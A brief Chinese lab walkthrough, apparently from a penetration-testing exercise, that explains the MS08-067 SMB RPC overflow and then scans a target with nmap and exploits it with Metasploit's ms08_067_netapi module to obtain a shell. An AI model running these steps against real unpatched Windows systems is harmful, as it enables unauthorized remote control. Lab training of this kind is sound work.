一、漏洞原理简介
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。
二、漏洞发现
扫描靶机版本开启的服务
nmap -sV 172.16.1.25
发现靶机开启了445端口,ms08-067漏洞利用的是445端口中的SMB服务
三、利用漏洞
1、打开kali中msfconsole漏洞测试平台
1、搜索ms08-067漏洞利用模块
search ms08-067
2、使用漏洞攻击模块
use exploit/windows/smb/ms08_067_netapi
3、查看该模块需要配置的参数
show options
4、设置目标靶机IP
set RHOST 172.16.1.25
5、运行攻击模块
run
利用成功,成功拿到靶机shell
6、查看信息
我们可以通过此漏洞拿到我们想要的信息及远程控制
利用完成,实验结束